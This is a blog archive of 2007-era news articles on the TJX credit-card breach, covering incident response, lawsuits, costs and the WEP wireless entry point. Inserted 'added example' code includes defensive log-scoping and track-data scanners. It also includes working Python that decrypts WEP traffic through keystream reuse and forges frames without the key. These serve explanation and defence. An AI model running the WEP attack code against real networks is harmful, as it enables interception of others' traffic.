Monday, February 04, 2008
What Not to Do After a Security Breach
Expert familiar with TD Ameritrade, TJX cases discusses the mistakes enterprises often make following a breach
OCTOBER 26, 2007 | 4:00 PM
By Kelly Jackson Higgins
Senior Editor, Dark Reading
Step number one after a security breach: Don't immediately bring in the outside forensics team -- get your attorney up to speed on the attack first. And don't assume just because you had a break-in that you have to disclose it publicly -- it all depends on whether data covered under regulatory mandates was exposed.
These are two bits of advice to the security-breached from Kevin Mandia, a forensics expert who has worked on the front line of the TD Ameritrade investigation and is serving as an expert in the TJX breach case. Mandia will testify as an expert witness for the credit- and debit-card issuers if the TJX case goes to trial.
Mandia takes a different view than some breach experts, who encourage enterprises to make swift disclosure of suspected breaches. (See What to Do When Your Security's Breached.)
"Only 'the need to know' should be 'in the know,'" says Mandia, CEO of Mandiant, who for the past 15 years has worked on over 100 computer security breaches with the Fortune 500, FBI, and military. He's seen a lot of mistakes made by victims over the years, he says, as well as major shifts in how companies must respond in today's regulatory and disclosure environment.
Mandia, who couldn't comment directly on the Ameritrade or TJX cases, says over half of the cases that his firm responds to don't actually require public disclosure at all. "This happens a lot -- a database gets compromised and the systems admin pushes back his chair and says 'our database has been compromised,' and the rumor mill starts," he says. "Even if there's no 'covered' [regulated] data on the database, people start talking about it, the Wall Street Journal [reports it]."
"I still believe that in over 50 percent of the [incidents] we respond to, disclosure is not required," Mandia says. "Even if there's 'covered' data in the system, it could be encrypted, for instance, and it's unreasonable to think it was compromised."
Attorney-client privilege goes a long way. "The need for counsel is one of the biggest changes I've seen in incident response in the past two years," he says. "But it's very important to have counsel involved before we are -- for attorney-client privilege."
Another big misstep is misjudging whether sensitive data covered by regulatory requirements has been breached. "If I have a computer that's been compromised, I don't have to disclose that my computer has been breached," says Mandia, who will be presenting some of his findings in forensic investigations at the SecTor security conference in Toronto next month. Disclosure is required only if data that falls under HIPAA, SOX, PCI, the FTC safeguards rule, or state privacy laws, for instance, has been breached, he says.
Typically, the IT or security technicians in the trenches have to respond and provide their opinions to upper management and counsel on whether data was exposed. "The biggest challenge is technicians are not very good with gray areas, and they're not suited for making opinions" on this, he says. "It's actually better for a layperson to do it."
Another common error companies make is assuming that the attack was an inside job, and focusing only on that attack vector. "Nine out of 10 think it's an insider... that there's no way their crown jewels could be compromised [by an outsider]," Mandia says. "The catch is that insider investigations are 10 times more costly than external ones because [they must work] surreptitiously -- it's us versus us."
So it can take months to investigate, and it may be all for naught if the breach actually came from outside, he says. Not to mention lost time in catching the real perpetrators on the outside. "Firms need to move as fast as they can for the first five days... If they do that, they are more successful," he says. "But most are making their decisions too damn slowly."
Part of the problem is in most cases, there isn't just one "owner" of the incident response in an organization. The internal investigation often has people going off in different directions and not coordinating their findings, which leads to mistakes and inefficiencies. "You need one guy who handles it appropriately and has enough clout to be a leader," Mandia says. "It needs to be someone no less than two rungs from the top."
Meanwhile, the process of forensic data collection has changed: Because of the nature of today's malware, companies must now acquire and analyze system memory as well as disk during their investigations, he says. "You have to inspect within the memory," he says.
And most organizations today are running in fear of kernel-level rootkits, he says. "Everyone is chasing that ghost, although they are not finding a lot of them," he says. "Everyone wants to do rootkit detection when responding" to a breach, he says.
The attack techniques, however, are basically same old, same old, he says. "The vulnerabilities are generally going to be in Office and PowerPoint and they are still coming in via email," he says, and users are still being duped into clicking infected attachments with trojans and keyloggers, for instance.
Labels: TD Ameritrade Holding Corp., TJX Companies Inc.
How TJX Became a Lesson In Proper Security
By Andy Patrizio
The TJX security breach is threatening to rank as one of the most expensive lessons in corporate data security policies.
With the retailer facing anywhere from $500 million to nearly $1 billion in expenses, not to mention a black eye with the public over how their credit card data is secured, this experience should serve as a lesson to other retail outlets on securing their networks. How well they are learning is the question.
The latest chapter in this still-unfinished book is a settlement between TJX Companies and Visa U.S.A. Under the agreement, TJX will pay a maximum of $40.9 million to fund an alternative recovery payments program for customers affected by the breach. TJX has already taken the charge for the settlement and, by settling with Visa, staves off potential lawsuits.
Additionally, Visa will suspend and rescind a portion of the data breach fines it levied on TJX's U.S. acquirer that remain eligible for appeal. Visa and TJX agreed to the suspended and rescinded fines in part because it would increase the funds available in the alternative recovery program.
Not that the company is in the clear. According to a report from Merchant Link, which provides secure systems for retail outlets, the breach has cost the company more than $130 million to secure its infrastructure, there have been 19 lawsuits filed and there are investigations underway by the Federal Trade Commission and 37 state Attorneys General.
All this seems to have driven the message home to retailers, including TJX itself. "TJX accelerated their security program and implemented the improvements needed to become PCI (Payment Card Industry)-compliant, including upgrading their wireless security and eliminating the storage of sensitive authentication data. In fact there is some discussion about TJX becoming a 'spokescompany' for PCI security," said Avivah Litan, senior security analyst for Gartner.
Perhaps, but TJX was not keen on discussing its new security plans in detail, as it did not respond to repeated requests for an interview. TJX is the parent company of T.J. Maxx, Marshalls, HomeGoods and A.J. Wright stores in the U.S., as well as Winners and HomeSense in Canada. Revenue for its most recent fiscal year ended January 2007 was $17.4 billion. For so large a company, though, the breach started small, with crackers hacking into wireless networks at two U.S. stores.
The stores were using the relatively weak Wired Equivalent Privacy (WEP) protocol instead of the stronger Wi-Fi Protected Access (WPA) protocol, but what really hurt is that the intruders were able to access the TJX internal systems and move around freely for roughly 18 months. The breaches began in mid-2005 and ran through December 2006. It is estimated 45.7 million card records were stolen.
That was TJX's bigger problem, letting the intruders roam freely for 18 months. Dr. Anton Chuvakin, a security expert with LogLogic, said TJX didn't have decent traffic logs. "What took TJX months was looking at all their systems and determining who took what data, from where, where it was sent, etc. The investigation took them months. They likely didn't have any logs, because they had to do system forensics rather than log analysis to arrive at their conclusions about who stole the data and how. If they had collected and analyzed log data centrally, the investigation would have been a piece of cake," he said in an e-mailed comment to InternetNews.com.
Brian Cleary, vice president of marketing for the enterprise access governance firm Aveksa, concurred. "They didn't have good access controls, they were not auditing access on a regular basis and not checking log files and access. It was really poor security governance," he said.
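Chuvakin's point above is that the scoping questions an investigator must answer (who took what data, from where, where it was sent, and for how long) become a query against a central log store rather than disk forensics on every host. The following is an added example, not code from the article or from any of the firms quoted: it parses a constructed, syslog-style key=value event stream (hostnames, account names, addresses and row counts are all invented) and joins authentication, database query and firewall egress records on source address to build a scope report for one account.

```python
from datetime import datetime

# Constructed sample of centrally collected events in a syslog-like key=value form.
# Hostnames, account names, addresses and row counts are invented for this example.
SAMPLE_LOGS = """\
2006-11-14T02:13:05Z store0142-wlan assoc client=00:1a:2b:3c:4d:5e ssid=STORE_POS result=ok
2006-11-14T02:15:40Z store0142-ctrl login user=svc_pos src=10.142.0.77 result=success
2006-11-14T02:16:02Z store0142-ctrl login user=jsmith src=10.142.0.20 result=success
2006-11-14T02:20:11Z hq-db01 query user=svc_pos src=10.142.0.77 table=card_tx rows=1200000
2006-11-14T02:31:09Z hq-db01 query user=jsmith src=10.142.0.20 table=inventory rows=40
2006-11-14T02:48:30Z hq-fw01 egress src=10.142.0.77 dst=203.0.113.9 bytes=812345678 proto=ftp
2006-12-02T01:05:12Z hq-vpn login user=svc_pos src=198.51.100.23 assigned=10.200.0.5 result=success
2006-12-02T01:09:44Z hq-db01 query user=svc_pos src=10.200.0.5 table=card_tx rows=350000
2006-12-02T01:40:00Z hq-fw01 egress src=10.200.0.5 dst=203.0.113.9 bytes=240000000 proto=ftp
"""


def parse_event(line: str) -> dict:
    """Split 'timestamp host event k=v k=v ...' into a dict."""
    ts, host, event, *fields = line.split()
    rec = {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "host": host, "event": event}
    for field in fields:
        key, _, value = field.partition("=")
        rec[key] = value
    return rec


def scope_account(log_text: str, account: str) -> dict:
    """Answer the scoping questions for one account: from where, what data, sent where, how long."""
    events = [parse_event(ln) for ln in log_text.splitlines() if ln.strip()]
    acct_events = [e for e in events if e.get("user") == account]
    if not acct_events:
        return {"account": account, "sources": [], "tables": {}, "egress": [], "dwell_days": None}

    # "From where": every address the account authenticated or queried from,
    # including the internal address a VPN concentrator handed out.
    sources = set()
    for e in acct_events:
        if e["event"] == "login" and e.get("result") == "success":
            sources.add(e["src"])
            if "assigned" in e:
                sources.add(e["assigned"])
        elif e["event"] == "query":
            sources.add(e["src"])

    # "What data": rows read per table.
    tables = {}
    for e in acct_events:
        if e["event"] == "query":
            tables[e["table"]] = tables.get(e["table"], 0) + int(e["rows"])

    # "Where it was sent": firewall egress records carry no user, so join on source address.
    egress = [(e["dst"], int(e["bytes"])) for e in events
              if e["event"] == "egress" and e["src"] in sources]

    first = min(e["ts"] for e in acct_events)
    last = max(e["ts"] for e in acct_events)
    return {"account": account, "sources": sorted(sources), "tables": tables,
            "egress": egress, "first_seen": first.isoformat(), "last_seen": last.isoformat(),
            "dwell_days": (last - first).days}


if __name__ == "__main__":
    for acct in ("svc_pos", "jsmith"):
        print(scope_account(SAMPLE_LOGS, acct))
```

The join on source address is the step that host-by-host forensics cannot do cheaply: the firewall never saw a username, and the database never saw the destination of the FTP session, but with all three feeds in one place the 1.55 million rows read from `card_tx` and the two transfers to 203.0.113.9 line up in a single report. The same query run against the ordinary `jsmith` account returns only its inventory lookups and no egress, which is how an investigator separates the compromised credential from normal use.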
TJX's second mistake was storing vital credit card information, such as the data encoded on the card's magnetic stripe, on local machines. This is particularly frustrating to banks, according to Litan, because full track data allows counterfeiters to make perfect duplicate cards.
Merchant Link's report specifically recommends to all clients that they eliminate the storage of sensitive personal data wherever possible by using secure third party services to keep the point of sale clean, and "certainly" do not store the data collected from a credit card's magnetic stripe.
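The check a practitioner wants after reading the recommendation above is whether full magnetic-stripe data is sitting anywhere on their own systems: PCI DSS forbids storing full track contents after authorization even when encrypted, while a truncated PAN (first six and last four digits) may be kept. The following scanner is an added example, not code from the article, Merchant Link, or TJX. It matches the ISO/IEC 7813 track 1 and track 2 record layouts, applies a Luhn check so that arbitrary digit runs are not reported, and masks the PAN in its own output so the scan results do not themselves become card data. The sample log is constructed; the PANs are the public Visa and Mastercard test numbers and the terminal IDs, names and timestamps are invented.

```python
import re

# Track 2 (ISO/IEC 7813): ';' PAN(13-19 digits) '=' YYMM service-code discretionary '?'
TRACK2_RE = re.compile(r";(\d{13,19})=(\d{4})(\d{3})(\d*)\?")
# Track 1 format B: '%B' PAN '^' cardholder name '^' YYMM service-code discretionary '?'
TRACK1_RE = re.compile(r"%B(\d{13,19})\^([^^?]{2,26})\^(\d{4})(\d{3})([^?]*)\?")


def luhn_ok(pan: str) -> bool:
    """Luhn check-digit test; weeds out digit runs that merely look like a PAN."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep first six and last four digits, the truncation PCI DSS allows to be displayed."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track_data(text: str) -> list:
    """Return every Luhn-valid track 1 or track 2 record in text, PAN masked, in file order."""
    findings = []
    for m in TRACK2_RE.finditer(text):
        if luhn_ok(m.group(1)):
            findings.append({"track": 2, "pan": mask_pan(m.group(1)),
                             "expiry": m.group(2), "offset": m.start()})
    for m in TRACK1_RE.finditer(text):
        if luhn_ok(m.group(1)):
            findings.append({"track": 1, "pan": mask_pan(m.group(1)),
                             "name": m.group(2), "expiry": m.group(3), "offset": m.start()})
    return sorted(findings, key=lambda f: f["offset"])


# Constructed POS debug log: two raw swipes that should never have been written to disk,
# one properly truncated authorization record, and one digit run that fails the Luhn check.
SAMPLE_LOG = (
    "2006-11-14 02:20:11 term=0142-03 swipe raw="
    "%B5555555555554444^DOE/JOHN^0812101000000000000000?\n"
    "2006-11-14 02:20:12 term=0142-03 swipe raw=;4111111111111111=0812101123456789?\n"
    "2006-11-14 02:20:13 term=0142-03 auth approved pan=411111******1111 amt=49.99\n"
    "2006-11-14 02:20:14 term=0142-03 swipe raw=;1234567890123456=0812101000000000?\n"
)


def scan_sample() -> list:
    return find_track_data(SAMPLE_LOG)


if __name__ == "__main__":
    for finding in scan_sample():
        print(finding)
```

Run against the sample it reports exactly two records, the track 1 and track 2 swipes, and stays quiet on the truncated `auth approved` line and on the Luhn-invalid digit run. In practice the same function would be pointed at POS logs, database dumps, crash files and backups, since the stores' debug output and local databases are where this data tends to accumulate unnoticed.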
Litan said TJX was certainly at fault for storing the magnetic stripe information, but she also thinks banks have a bigger role to play in the design of the payment systems. "They rolled [payment systems] out before there were cyberthieves and no one thought about security," she said. "The payment system architecture is legacy, outdated. They could update the arch and make them more secure or just require a PIN on every transaction. Instead, they'd rather keep it as business as usual and keep collecting revenue streams."
She explained that banks make more money on standard credit card transactions instead of PIN-based transactions, such as with a debit card. PINs are always encrypted and never stored when used, and would eliminate a majority of the potential problems because without a PIN, a card is useless.
John Livingston, chairman and CEO of asset management firm Absolute, concurred that companies need to smarten up about business in the Internet era. "As we adopt new technologies, there's a whole set of new procedures, policies and practices that need to take place," he told InternetNews.com. "The companies that are doing these transactions need to be educated. But there are solutions to all these things. It's not impossible to transmit secure data, it just takes dollars and a commitment from the company to make it happen."
Absolute recommends a layered approach of technologies and policies. "You want to identify and control all the sensitive data. You need to make sure it's stored in a secure facility, you need to put the policy and procedure in place to make sure it's safe," said Livingston.
Litan said some companies have not learned the lesson of TJX's experience and have been reluctant to make significant investments in such security measures because they see no return on investment. "It's a calculated risk, I guess. They just don't want to spend time on boring security projects. There's no ROI in security, it's basically cost avoidance," she said.
But Cleary said some firms got the message. "The ones that value their brand and are a bit more forward thinking are willing to do what it takes," he said. "When you look at cost containment, you wouldn't make decisions on your home insurance that way. Why you would risk the business to that degree makes no sense and is not in the shareholder's best interests."
He added "I think there were a lot of pages of publications [covering the story] that were ripped out and handed to CIOs and Chief Security Officers and asked 'This won't happen to us, right?' This has elevated the concerns about having good security governance in place all the way to the board level."
Labels: TJX Companies Inc.
Friday, June 22, 2007
Credit union bills TJX $590,000 for data breach costs
Compliance News
Card-issuing credit union offloads costs of new cards and reputation damage onto noncompliant merchant
6.7.07 In another development in the TJX data breach case, a Massachusetts credit union has billed the company $590,000 in expenses it incurred as a result of hackers stealing data from the TJX system.
HarborOne Credit Union in Brockton, MA, said it had to replace 9,000 cards at a cost of $90,000 as a direct result of the incident.
The credit union also calculated that the incident cost it $500,000 in brand and reputational damage.
The credit union invoiced TJX in April but has not received any acknowledgment.
Labels: TJX Companies Inc.
Monday, June 11, 2007
TJX faces five more breach-related state lawsuits
Five additional states have filed lawsuits against TJX over the massive data breach that exposed some 45.7 million credit card numbers to hackers, the retailer reported on Thursday in a federal regulatory filing.
Framingham, Mass.-based TJX, which operates more than 2,000 locations, including hundreds of Marshall’s and T.J. Maxx stores, was named in lawsuits in Illinois, Michigan, Ohio, Texas and Missouri, according to the filing with the Securities and Exchange Commission (SEC). The company previously has been named in lawsuits in Massachusetts, Alabama and California and in Puerto Rico and six Canadian provinces.
The plaintiffs mostly contend in the lawsuits that TJX exhibited "negligence" related to the intrusions in which thieves quietly pilfered sensitive customer data for two years until TJX detected the breach last December.
A company spokesperson did not return a telephone call for comment. CEO Carol Meyrowitz apologized for the breach to a number of stockholders at the company’s annual shareholders meeting earlier this week.
Some of the new lawsuits also name Cincinnati-based Fifth Third Bank, the credit card processor for TJX, as a defendant. A bank spokesperson could not immediately be reached for comment.
The banks responsible for issuing the credit and debit cards must cover the millions of dollars of costs associated with the breach, according to most state laws. But by filing the lawsuits, banks and customers are calling for TJX to be held liable, Diana Kelley, an analyst with the Burton Group, told SCMagazine.com today.
"They’re saying, ‘We’d like somebody to absorb the costs of this. We didn’t do anything improper, yet we’re incurring huge fees for the replacement of these cards and the notifications to cardholders.'"
Kelley said Minnesota has approved a law that shifts the burden to the merchants in the event of a data breach, and Massachusetts and Texas are considering similar measures.
"I’m looking at this as a watershed moment," she said. "I do think we will look back [at TJX] and say, ‘This really started to change things.’"
The SEC filing also reported that TJX is the subject of a 37-state attorneys general investigation studying whether the company violated any laws related to consumer protection. TJX is not believed to have been Payment Card Industry (PCI) compliant because Visa has since said it is not aware of any compliant companies ever being breached.
At least one financial institution is not waiting for a court to decide whether TJX is responsible to absorb fees. According to media reports, Brockton, Mass.-based HarborOne Credit Union has billed the company for $590,000 – $90,000 to replace credit cards and $500,000 for alleged brand reputation damage.
Meanwhile, TJX on Thursday reported 2007 sales are up three percent compared to the same 17-week period last year.
Labels: TJX Companies Inc.
Saturday, May 19, 2007
Banks file suit against TJX over breach costs
Dan Kaplan Apr 25 2007 17:22
Three state banking associations announced Tuesday that they have filed a joint lawsuit against TJX Companies over "dramatic costs" their 300 members have incurred since the discount retailer announced that hackers infiltrated its processing systems, exposing some 45 million credit card numbers.
The Massachusetts Bankers Association (MBA), the Maine Association of Community Banks, and the Connecticut Bankers Association are co-plaintiffs in the lawsuit against Framingham, Mass.-based TJX.
The company, which operates about 2,500 stores including Marshalls and T.J. Maxx outlets, revealed late last month that hackers stole 45.7 million pieces of data when they illegally accessed TJX databases during 2005 and 2006.
Merchant banks have been forced to cover replacement cards — up to $25 each — as well as any costs associated with fraudulent purchases, the MBA said in a statement. The organization has previously said the stolen data was used for purchases in Florida, Georgia, Louisiana, Hong Kong and Sweden.
"Cases of fraud due to the TJX breach have been reported all over the world," the statement said. "At the time that the MBA is filing this lawsuit, banks throughout New England continue to receive lists of ‘hot' cards that have been exposed in the TJX data breach, more than three months after TJX first disclosed the problem."
Daniel Forte, president and CEO of the MBA, said the three banking associations are seeking the recovery of "tens of millions of dollars" in damages.
The lawsuit could have merit if TJX acted with negligence, Forrester vice president and research director Jonathan Penn told SCMagazine.com today.
"That's the burden they're going to face in this suit," he said.
Andy Serwin, a San Diego lawyer specializing in data privacy and security, told SCMagazine.com that in his experience, many lawsuits similar to this one get tossed out in court. He said it is difficult for plaintiffs to make a case because many of the laws governing electronic privacy allegations have yet to be fully understood.
"The states are all over the place," he said. "You're applying old law to situations that were never anticipated. Where the line is going to get drawn ultimately, it's not that clear yet."
He said some states will let retailers off the hook if a criminal act caused the data exposure.
"Ultimately, we're going to see new insurance products out there to deal with risk," Serwin said.
A legal debate such as this may soon be unnecessary in Massachusetts. State lawmakers have proposed a bill that makes retailers responsible for data losses.
A TJX spokesperson could not immediately be reached for comment.
Labels: TJX Companies Inc.
Report: TJX breach began in Minnesota Marshalls parking lot
Dan Kaplan May 4 2007 17:00
The suspects who lifted the personal data of 45.7 million customers from TJX's processing systems hatched their elaborate plan some two years ago at a Marshalls outlet in Minnesota, where they used simple technology to tap into the store's wireless connection, The Wall Street Journal reported today.
According to the story, citing investigators, the intruders, from the parking lot, used a "telescope-shaped antenna" and a laptop to decode data that was moving among the Marshalls store’s scanning devices, cash registers and PCs, which were using wireless LAN connectivity.
What the intruders either learned or physically planted that day helped them later hack into TJX’s main database, where they quietly pilfered data for two years and ended up executing the largest data breach in the nation’s history.
Investigators told the newspaper that the St. Paul, Minn. Marshalls location was running a wireless network protected by Wired Equivalent Privacy (WEP), a weak industry standard that has since been superseded by the more robust Wi-Fi Protected Access (WPA) specifications.
TJX operates more than 2,000 discount retailers, including hundreds of Marshalls.
Gartner Vice President and Senior Fellow John Pescatore told SCMagazine.com today that the replacement standards - required under the Payment Card Industry mandates - are much more secure than WEP, which was "riddled with holes," he said.
"The encryption to keep someone from breaking in was done very poorly in this first generation," he said. "It's no better than (no security at all). This is something I would have thought an audit would've caught."
The antenna the newspaper described is a common tool for picking up a wireless signal from a distance, Pescatore said.
He said he has heard of people creating antennae out of Pringles potato chip cans - and several websites offer instructions on how to do so. Then, he said, "all it takes is a laptop with Windows XP and it tells you what access points it can hear. It doesn't take any special equipment."
The hackers may have planted some malware on the network that day to help them later access the central database, or they may have stolen certain data that allowed them to later intrude, Pescatore said.
"The basic issue is if you connect to an access point that puts you on the network, it's just as good as if you broke into their data center and sat down on a PC," Pescatore said. "You're on their network."
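The holes Pescatore refers to are concrete and cheap to exercise. The example below is added here to show two of them; it is not code from the article, from TJX or from the investigators, and the key, IV and frame payloads are constructed. It follows the WEP construction from IEEE 802.11-1999: the per-packet RC4 key is the 24-bit IV (sent in the clear) prepended to the shared key, and the keystream is XORed over the payload plus a CRC-32 integrity check value (ICV). Two frames that reuse an IV share a keystream, so XORing their ciphertexts cancels the key entirely, and because CRC-32 is linear an attacker can flip bits in a frame and patch the ICV without knowing the key at all.

```python
"""Why WEP was 'riddled with holes': keystream reuse and a malleable ICV.

Added example, not code from the article or from any party in it. The key,
IV and frame payloads below are constructed. RC4 and the framing (per-packet
key = IV || shared key, keystream XORed over payload || CRC-32 ICV) follow
WEP as specified in IEEE 802.11-1999; the 3-byte IV travels in the clear.
"""
import math
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling plus PRGA, returning `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body = IV || RC4(IV||key) XOR (payload || CRC32(payload))."""
    assert len(iv) == 3, "WEP IVs are 24 bits"
    body = payload + zlib.crc32(payload).to_bytes(4, "little")
    return iv + xor_bytes(body, rc4_keystream(iv + shared_key, len(body)))


def wep_decrypt(shared_key: bytes, frame: bytes):
    """Returns (payload, icv_ok). A WEP receiver only checks the CRC, not a MAC."""
    iv, ct = frame[:3], frame[3:]
    body = xor_bytes(ct, rc4_keystream(iv + shared_key, len(ct)))
    payload, icv = body[:-4], body[-4:]
    return payload, zlib.crc32(payload).to_bytes(4, "little") == icv


def recover_with_known_plaintext(frame_a: bytes, frame_b: bytes, known_payload_a: bytes) -> bytes:
    """Same IV, same key => same keystream, so C_a ^ C_b = P_a ^ P_b.
    Knowing P_a (a predictable request, say) yields P_b with no key at all.
    Bytes past len(P_b) are P_b's ICV, so callers should use startswith()."""
    assert frame_a[:3] == frame_b[:3], "needs an IV collision"
    n = min(len(frame_a), len(frame_b)) - 3
    n = min(n, len(known_payload_a))
    return xor_bytes(xor_bytes(frame_a[3:3 + n], frame_b[3:3 + n]), known_payload_a[:n])


def flip_bits_without_key(frame: bytes, delta: bytes) -> bytes:
    """CRC-32 is affine: crc(p ^ d) = crc(p) ^ crc(d) ^ crc(0...0). An attacker
    XORs `delta` into the ciphertext and patches the encrypted ICV to match,
    so the altered frame still passes the receiver's integrity check."""
    iv, ct_payload, ct_icv = frame[:3], frame[3:-4], frame[-4:]
    delta = delta.ljust(len(ct_payload), b"\x00")
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(len(ct_payload)))
    return iv + xor_bytes(ct_payload, delta) + xor_bytes(ct_icv, icv_delta.to_bytes(4, "little"))


def expected_frames_until_iv_repeat(iv_bits: int = 24) -> float:
    """Birthday bound on random IVs: roughly sqrt(pi/2 * 2^bits) frames.
    A busy access point sends that many packets in minutes; firmware that
    restarts the IV counter at zero after a reset collides far sooner."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)


if __name__ == "__main__":
    key, iv = b"\x0b\xad\xc0\xff\xee", b"\x00\x00\x2a"      # constructed 40-bit key and IV
    known = b"GET /index.html HTTP/1.0"                      # predictable frame
    secret = b"card=4111111111111111"                        # frame an attacker wants
    fa, fb = wep_encrypt(key, iv, known), wep_encrypt(key, iv, secret)
    print(recover_with_known_plaintext(fa, fb, known)[:len(secret)])
    forged = flip_bits_without_key(fa, bytes(4) + xor_bytes(b"/index.html", b"/admin.html"))
    print(wep_decrypt(key, forged))
    print(int(expected_frames_until_iv_repeat()))
```

Neither attack needs the shared key, which is why a parking-lot antenna and a laptop are enough: passive capture until an IV repeats gives keystream, and any known or guessable frame (DHCP, ARP, an HTTP request) turns that keystream into plaintext for every other frame under the same IV. WPA replaced the per-packet RC4 key construction and the CRC with a keyed message integrity code, closing both holes.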
The incident highlights the need for business executives to understand the value of information assets, Wain Kellum, president and CEO of Atlanta-based Trusted Network Technologies, told SCMagazine.com today.
He said that in many cases "fairly low-level network engineers" create wireless policies without any understanding of risk or financial impact to the organization if there is a breach.
"Management people are now starting to get aware that they have to participate in the dialogue," Kellum said.
A TJX spokeswoman could not be reached for comment today.
Since the breach, the Federal Trade Commission has launched an investigation, and three New England banking associations filed a lawsuit seeking to recoup costs associated with fraudulent purchases.
However, TJX has reported no negative effect on sales, which rose during the first quarter of this year.
Labels: TJX Companies Inc.
Tuesday, May 08, 2007
Running for IP Cover
May 7, 2007
By Lisa Vaas
In the wake of incidents such as the TJX Companies' massive data breach, reported in January, it shouldn't come as a surprise to find that 90 percent of companies plan to plug in new technology to secure electronic copies of intellectual property in the coming year.
The ESG survey—sponsored by information protection company Reconnex—is the first in a quarterly series on the topic.
One of the findings that surprised ESG was how big the IP problem is, according to Eric Ogren, a security analyst for ESG, in Milford, Mass.
Top priorities
Protecting PII (personally identifiable information) such as credit card numbers and Social Security numbers is not actually the top priority with most organizations, Ogren said.
"We asked upfront, 'What do you consider to be intellectual property?'" he said. "What they want to protect is financial information, contracts and agreements. Only after that is PII."
Other IP that companies are looking to protect include—in order of reported priority—source code, competitive intelligence, internal research data, design specifications, customers' PII, trade secrets, CRM (customer relationship management) databases and patent documents.
What's tough about protecting such data is that it comes in so many different forms. Much of it doesn't fit into a neat fixed format, as Social Security numbers or credit card numbers do, for example. Instead, it comes from all over the network.
"If you think e-mail is your only issue, you're only solving 20 percent of the problem," Ogren said.
Tremendous resources are being spent to search for networked IP, Ogren added, in terms of both manual and automated procedures. According to the report, 78 percent of those surveyed search for electronic versions of IP at least once per quarter.
"[This] is a major investment of time and resources," Ogren said. "It's in many different forms, in many different places, communicated with many different protocols."
As for the biggest perceived threat when it comes to data loss, malicious or sloppy insiders scare survey respondents the most.
Twenty-four percent of respondents pointed to malicious insiders as the biggest threat to their IP falling into the wrong hands, while 34 percent feared that the problem lies with negligent insiders: employees who just want to do their jobs but don't understand the risk of IP stored on their laptops, for example.
Only 20 percent of respondents think that hackers are their biggest threat in this regard. The balance of threats is seen as coming from lack of security oversight (17 percent) or lack of distribution control (5 percent).
The ESG report puts forth four best practices for leakage protection.
First, ESG recommends enterprises define comprehensive requirements for IP and PII at the same time. Protecting against leakage of one protects against leakage of the other, the company maintains.
It's also necessary to segregate IP protection duties, according to ESG. That means empowering security teams to provide independent oversight of operations, including monitoring insider use of information.
ESG also suggests automating discovery of IP, to cut down on the time and money currently being devoted to discovery.
Finally, ESG recommends network-based solutions over distributed endpoint software. "I don't think endpoint software is going to solve it—it can't reside in all the places IP resides," Ogren said.
Labels: TJX Companies Inc.
Sunday, March 04, 2007
TJX Data Breach Worse Than Initially Reported
Jaikumar Vijayan
February 26, 2007 (Computerworld)
The massive data breach disclosed last month by The TJX Companies Inc. was far worse than first reported, the company said last week.
An ongoing internal investigation into the breach has shown that intruders gained access to TJX’s systems in July 2005, almost a full year earlier than first thought.
The investigation has also found that card transaction data from TJX-owned stores in the U.K. and Ireland were affected by the intrusion, the company acknowledged. Previously, TJX had said only that it was “concerned” that the breach may have extended to those countries.
“We are dedicating substantial resources to investigating and evaluating the intrusion,” TJX CEO Carol Meyrowitz said in a statement. More than 50 experts from IBM and General Dynamics Corp., hired by TJX to shore up security in the wake of the breach, are investigating the incident, Meyrowitz said.
TJX, owner of retail chains TJ Maxx, Marshalls and Bob’s Stores, last month revealed that someone had illegally accessed a payment system and made off with card data belonging to customers in the U.S., Canada and Puerto Rico and possibly in the U.K. and Ireland. At the time, the company said the breach had occurred in May 2006.
TJX hasn’t disclosed how many shoppers may have been affected by the breach. Some analysts believe the number could be in the millions.
Avivah Litan, an analyst at Gartner Inc., said the latest update by TJX could mean that officials are getting closer to finding the perpetrators.
“I think they have pinpointed [the intruders] to a large degree and may have found files indicating that 2005 [card] data was stolen,” she said.
TJX’s latest disclosure is not all that surprising and points to a broad lack of internal data controls at many large companies, security analysts said.
“When it comes right down to it, very few companies have effective controls to monitor internal systems closely and follow the movement of data” on their networks, said Alex Bakman, CEO of Ecora Software Corp., a Portsmouth, N.H.-based maker of compliance software. Therefore, such breaches can go unnoticed for a long time, he said.
“The underlying problem is that companies are treating security as a ‘nice to have’ as opposed to a ‘must have,’” Bakman said.
“TJX is just the tip of the iceberg. I think we are going to see many more” such disclosures, he added. “It’s going to get a lot uglier before it gets any better.”
Joel Rosen, CEO of security vendor Tizor Systems Inc. in Maynard, Mass., said, “Many companies that relied on traditional security are just coming to terms with the fact that beefing up existing systems is not the answer.”
The fallout from the breach has been widespread as U.S. and Canadian banks and credit unions have been forced to block and reissue thousands of cards. The New Hampshire Bankers Association has estimated that 20% to 30% of New England residents may have been affected by the breach.
Labels: TJX Companies Inc.
Wednesday, February 14, 2007
TJX breach occurred seven months before it was detected
Jaikumar Vijayan
January 22, 2007 (Computerworld)
The data breach at TJX Cos. that exposed sensitive credit and debit card data on an unknown number of customers occurred nearly seven months before it was detected, a company spokeswoman said today.
The breach occurred as far back as mid-May 2006 but was discovered only in mid-December, said company spokeswoman Debra McConnell. The original statement from Framingham, Mass.-based TJX announcing the data compromise last week mentioned only the discovery of the breach in December and made no reference to when the breach actually happened.
McConnell said the decision not to mention when the breach happened did not represent an "inconsistency" in the company's public reporting of the incident. "We had said in our press release that we had discovered the breach in mid-December but we did not put in when it occurred," she said.
McConnell did not provide details on the scope of the breach but reiterated the company's earlier statement that credit and debit card information belonging to "a limited number" of individuals had been stolen from the compromised system. "And by 'limited' we mean substantially less than millions," she said.
